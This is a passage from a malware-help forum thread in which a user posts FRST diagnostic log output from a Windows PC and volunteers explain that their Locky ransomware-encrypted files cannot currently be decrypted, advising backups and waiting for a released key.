HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "ShadowPlay"
HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3155403222-1004678540-3907824167-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [holoshellapp-In-TCP] => %systemroot%\holoshell\holoshellapp.exe
FirewallRules: [holoshellapp-Out-TCP] => %systemroot%\holoshell\holoshellapp.exe
FirewallRules: [compositor-In-TCP] => LPort=48862
FirewallRules: [compositor-Out-TCP] => LPort=48862
FirewallRules: [{38749D41-9B19-423A-8772-CF4A598E41CC}] => C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{BF921DD7-EDF3-4D31-93C6-31A21DB129FF}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C0409259-95BE-489A-96E7-3FC59394A6E5}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{2AFAB629-77CC-45E7-9A7F-8722C449D2BE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{000DEFFA-6821-4F9B-ACDD-AF56E8C2E22E}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{4008ED15-426B-4E27-8FF2-A6638805D27F}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{4B63113D-EA0B-4334-A428-3C3A67BCCFE5}] => C:\Program Files (x86)\SplashData\SplashShopper Desktop\SplashShopper Desktop.exe
FirewallRules: [{4D894AA0-7D8E-45E3-AD73-ED06CBC619FD}] => C:\Program Files (x86)\SplashData\SplashShopper Desktop\SplashShopper Desktop.exe
FirewallRules: [{6DE609A2-112E-4504-8DBB-C54963EB629F}] => I:\Common\EpsonNet Setup\ENEasyApp.exe
FirewallRules: [{4F31EDE2-4DE3-4856-A4C3-7CC1BC03A36E}] => I:\Common\EpsonNet Setup\ENEasyApp.exe
FirewallRules: [{0879753D-6892-4962-8665-C1AB3929BA56}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5C8BE526-A1C4-484B-851F-7FA123CC3083}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{C0DE496C-975C-4700-ACAB-5CF8ED569EF3}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{A0ADBAC6-FF70-40D4-82B7-4E7AB6C87D3D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{FAEF4F61-0D68-4974-B158-1F1D88F613F5}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{34811BD7-5AA1-4154-8096-5D2AFD62A2B0}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4E8F7955-1A2A-4D38-9A0A-26F8B1C0D081}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1183227F-8F60-44F4-BFD6-483BB0626E0E}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe
FirewallRules: [{CC4603FF-F649-42C0-B5E9-D15CA97CEEF1}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe
FirewallRules: [{480D28FB-7A85-495C-A76E-7DB65B81B845}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe
FirewallRules: [{8F52466D-0E61-4E99-879D-0D65035E3032}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe
FirewallRules: [{613F0329-2ED0-4ACB-B989-D99B368BE058}] => LPort=5357
FirewallRules: [{EE96252E-7B53-4693-AEE8-A71435FCAA1B}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe

==================== Restore Points =========================

24-01-2017 11:44:04 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2017 02:20:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2708
Faulting application start time: 0x01d2767de5ff3258
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: f5587d52-a24e-4860-8d30-d00f3678faaa
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 02:09:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x2a94
Faulting application start time: 0x01d2767dd3d7699a
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 4c5d09f9-5f34-4678-9c31-2b382d6cc0f9
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 02:05:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x1950
Faulting application start time: 0x01d2767bcd2bfaaf
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 69c4132b-9eee-4a47-b25d-e695be67e65e
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:55:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2d28
Faulting application start time: 0x01d2767a62c414b7
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 27e13a43-0e78-4021-b349-694029583fba
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:49:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x28e0
Faulting application start time: 0x01d2767af9b21589
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 30361fb0-10a7-4757-8b22-056317e39741
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:45:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x2760
Faulting application start time: 0x01d27678f7257d2e
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 80d6a599-dcc0-4d5c-90be-267fe81f259d
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:34:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x209c
Faulting application start time: 0x01d276777d6bef1e
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a08f967e-cb15-45bb-bb18-929285d05152
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 01:21:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x1c68
Faulting application start time: 0x01d276734c56cf2d
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 4ef94bc0-05dc-4e6b-ba44-1cec53db137f
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 12:52:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe_ResetEng.dll, version: 10.0.14986.1000, time stamp: 0x4067e605
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000409
Fault offset: 0x00000000000957ef
Faulting process id: 0x42c
Faulting application start time: 0x01d27673014f6918
Faulting application path: C:\WINDOWS\system32\rundll32.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 99fec37e-1aee-4d6a-8cec-770d4ded3f30
Faulting package full name:
Faulting package-relative application ID:

Error: (01/24/2017 12:48:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DllHost.exe, version: 10.0.14986.1000, time stamp: 0x5fae2cca
Faulting module name: ntdll.dll, version: 10.0.14986.1000, time stamp: 0xd8fc5bf5
Exception code: 0xc0000005
Fault offset: 0x000000000003c53d
Faulting process id: 0x186c
Faulting application start time: 0x01d2767108c0529b
Faulting application path: C:\WINDOWS\system32\DllHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 8ba9c4b7-3efb-4db4-86b1-4324441417a3
Faulting package full name:
Faulting package-relative application ID:


System errors:
=============
Error: (01/24/2017 02:28:30 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 02:12:59 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:43:42 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 and APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:33:12 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 and APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (01/24/2017 11:31:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:49 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.

Module Path: C:\WINDOWS\System32\bcmihvsrv64.dll

Error: (01/24/2017 11:31:39 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
An instance of the service is already running.

Error: (01/24/2017 11:31:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (01/24/2017 11:31:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA GeForce Experience Service service terminated unexpectedly.  It has done this 1 time(s).


CodeIntegrity:
===================================
  Date: 2017-01-24 11:35:49.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:35:49.047
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:54.490
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:54.489
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:53.624
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:53.622
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:23.695
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:28:23.694
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:14:04.299
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-01-24 11:14:04.298
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz
Percentage of memory in use: 48%
Total physical RAM: 8174.52 MB
Available physical RAM: 4179.76 MB
Total Virtual: 9454.52 MB
Available Virtual: 4842.48 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.73 GB) (Free:808.77 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:12.25 GB) (Free:1.83 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive j: (WD SmartWare) (CDROM) (Total:0.6 GB) (Free:0 GB) UDF
Drive k: (My Passport) (Fixed) (Total:930.86 GB) (Free:894.21 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4A1A018B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=918.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=12.2 GB) - (Type=07 NTFS)

========================================================
Disk: 5 (MBR Code: Windows XP) (Size: 930.9 GB) (Disk ID: 00052F35)
Partition 1: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
Re: File Type Question
« Reply #38 on: January 26, 2017, 03:13:10 PM »
Corrine, would you like me to run FRST without checking all the boxes and post those results?  I honestly did not know what I was doing when I first ran it.

Also, I have noticed when the computer starts and just before everything is ready to go, a very quick flash of a DOS screen comes up with one line of text.  It is so fast that I cannot read it, nor have I been quick enough to create a PrntScrn.  That used to never occur, so don't know if it has something to do with this ransomware or not, but thought it worth mentioning.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
Re: File Type Question
« Reply #39 on: January 26, 2017, 04:46:42 PM »
I just tried to download the newest version of Malwarebytes twice and failed because of the below that appeared in a popup box with a yellow triangle.  I attempted the Retry button several times and the same popup always appeared.  Maybe this has some significance.


C:\WINDOWS\system32\drivers\mbae64.sys

An error occurred while trying to replace the existing file:
DeleteFile failed; code 5
Access is denied.

Click Retry to try again, Ignore to skip this file (not
recommended), or Abort to cancel installation.

Offline Corrine

  • The Mystical Rose
  • Administrator
  • Hero Member
  • *****
  • Posts: 19425
  • "Stronger than the past, united in our goal."
    • Security Garden
Re: File Type Question
« Reply #40 on: January 26, 2017, 05:31:46 PM »
Don't bother with a fresh FRST scan, although I would like to see the Addition.txt that should be in the same folder.

An MBAM scan would be a good idea as I saw something in FRST.txt but also need to check the Addition.txt before providing a script and Malwarebytes may be able to take care of what I saw.

As to updating Malwarebytes, I ran into the same issue with updating from version 3.0.4 to 3.0.5.  Everything I tried including a complete uninstall and using FRST didn't solve the problem so I ended up clicking the not recommended Skip this file.  I was then able to update to 3.0.5 and subsequently to 3.0.6.  See if that works for you.


Take a walk through the "Security Garden" -- Where Everything is Coming up Roses!

Remember - A day without laughter is a day wasted.
May the wind sing to you and the sun rise in your heart.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
Re: File Type Question
« Reply #41 on: January 26, 2017, 07:35:51 PM »
I posted the Addition.txt at 3:05:33 up above. 

I was also able to get a print screen of that DOS screen that pops up now.  Should I share the content here or send it to you privately, if there is a way to do so?

Offline quietman7

  • Malware Experts
  • Jr. Member
  • *****
  • Posts: 22
Re: File Type Question
« Reply #42 on: January 26, 2017, 10:22:08 PM »
Sorry for the late reply but I was out of town for a few days and did not receive Corrine's PM until I returned.

Whether you can recover (decrypt) your files or not depends on what ransomware infection you are dealing with and a variety of factors. All crypto malware ransomware use some form of encryption algorithms, most of them are secure, but others are not. The possibility of decryption depends on the thoroughness of the malware creator, what algorithm the creator utilized for encryption, discovery of any flaws and sometimes just plain luck. Newer ransomware variants use a public and private key system where the public key is used to encrypt and the private key is used to decrypt. The private key is stored on a central server maintained by the cyber-criminals and not available unless the victim pays the ransom or at some point, law enforcement authorities arrest the criminals...seize the C2 server and release the private RSA decryption keys to the public. In some cases, the cyber-criminals, for whatever reason, choose to release the master keys after a period of time.
Quote
Dr.Web statistics show that the probability of restoring files compromised by encryption ransomware doesn't exceed 10%. That means that most of user data has been lost for good!
Dr.Web: Encryption ransomware - Threat No. 1

Unfortunately, there is no known way to decrypt files encrypted by CryptoWall, CTB-Locker, Locky (all variants), Mobef, Shade, DEDCryptor, Zyklon Locker (GNL), newer variants of PClock, newer variants of Al-Namrood/Apocalypse and many other ransomware variants without paying the ransom. This is primarily due to the type of encryption used and the fact that the key is not generated on the victim's computer ensuring it is much harder to break. Unless the criminals are found and arrested by the authorities, and/or the keys are recovered then provided to the public, there is no possibility that anyone can provide a decryption tool.

As already mentioned here...the best solution for dealing with encrypted data is to restore from backups. These types of infections typically will delete all Shadow Volume Copies so that you cannot restore your files via System Restore, native Windows Previous Versions or using a program like Shadow Explorer. But it never hurts to try in case the malware did not do what it was supposed to do...it is not uncommon for ransomware infections to sometimes fail to properly delete Shadow Volume Copies. In some cases the use of file recovery software such as R-Studio or Photorec may be helpful to recover some of your original files but there is no guarantee that will work...again it never hurts to try.

In cases where there is no workable free decryption fix tool and victims are not willing to pay the ransom, the only other alternative is to backup/save your data as is and wait for a possible breakthrough...meaning, what seems like an impossibility at the moment (decryption of your data), there is always hope someday there may be a potential solution so save the encrypted data and wait until that time. Imaging the drive backs up everything related to the infection including encrypted files, ransom notes and registry entries containing possible information which may be needed if a solution is ever discovered. The encrypted files do not contain malicious code so they are safe. Even if a decryption tool is available, there is no guarantee it will work properly or that the malware developer will not release a new variant to defeat the efforts of security researchers so keeping a backup of the original encrypted files and related information is a good practice.
Microsoft MVP - Consumer Security 2007-2015
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
Re: File Type Question
« Reply #43 on: January 28, 2017, 05:03:33 PM »
Thank you so much, Quietman7.  After all the reading I've done, I was afraid something like this might be the response, not what I wanted to hear but what I feared. 

From your message above, I understand that:

I need to back up the computer as it is now.  Have to buy another external drive to accomplish that.  The one I have that had never been used did not work on this newer computer, etc.  The backup is so that, if in the future, a key is found/released to unencrypt the data I will have it available.

That the ransomware should not affect any future documents, etc.

If I have misunderstood, please let me know.

I also have a question about the hard drive.  Although I understand computers to a large extent (at least I think I do - but I don't understand much about viruses and that ilk), I would like anyone's opinion about this.  If the current hard drive is removed and a new one installed, will the ransomware no longer be in the computer?  I know this is a dumb question, but I would like to know the answer.  I am more than willing to buy a new internal hard drive.

Thank you all for your patience and understanding of my situation and my ignorance about some matters.

Offline quietman7

  • Malware Experts
  • Jr. Member
  • *****
  • Posts: 22
Re: File Type Question
« Reply #44 on: January 28, 2017, 09:07:09 PM »
I wish I had better news but unfortunately Locky is one of those variants which currently is not decryptable. But there is always hope....After about a year, the criminals behind TeslaCrypt shut down and released the master decryption key so thousands of victims were able to get back their files if they backed up and saved them. So backup/save your data as is and wait for a possible breakthrough...meaning, what seems like an impossibility at the moment (decryption of your data), there is always hope someday there may be a potential solution so save the encrypted data and wait until that time. Imaging the drive backs up everything related to the infection including encrypted files, ransom notes and registry entries containing possible information which may be needed if a solution is ever discovered.

Corrine posted the link for the Locky Ransomware Support and Help Topic on the first page. I suggest you subscribe to it. When or if a solution is found, that information will be provided in that support topic and you will receive notification if subscribed to it.

Most crypto malware ransomware is typically programmed to automatically remove itself...the malicious files responsible for the infection...after the encrypting is done since they are no longer needed. That explains why many security scanners do not find anything after the fact. The encrypted files do not contain malicious code so they are safe.

Crypto malware ransomware typically propagates itself as a Trojan Horse. Trojans do not reproduce by infecting other files nor do they self-replicate. Instead they spread through social engineering and human exploit/interaction (the weakest link in security).
Quote
Section 2 in this topic explains in more detail the most common methods Crypto malware (file encrypting ransomware) and other forms of ransomware is typically delivered and spread.

Unfortunately, most victims do not realize they have been infected until the ransomware displays the ransom note and the files have already been encrypted. In some cases there may be no ransom note and discovery only occurs at a later time when attempting to open an encrypted file. As such, they don't know how long the malware was on the system before being alerted or if other malware was downloaded and installed along with the ransomware. If other malware was involved it could still be present so posting for assistance at a forum like this with experts checking your system is a wise thing to do.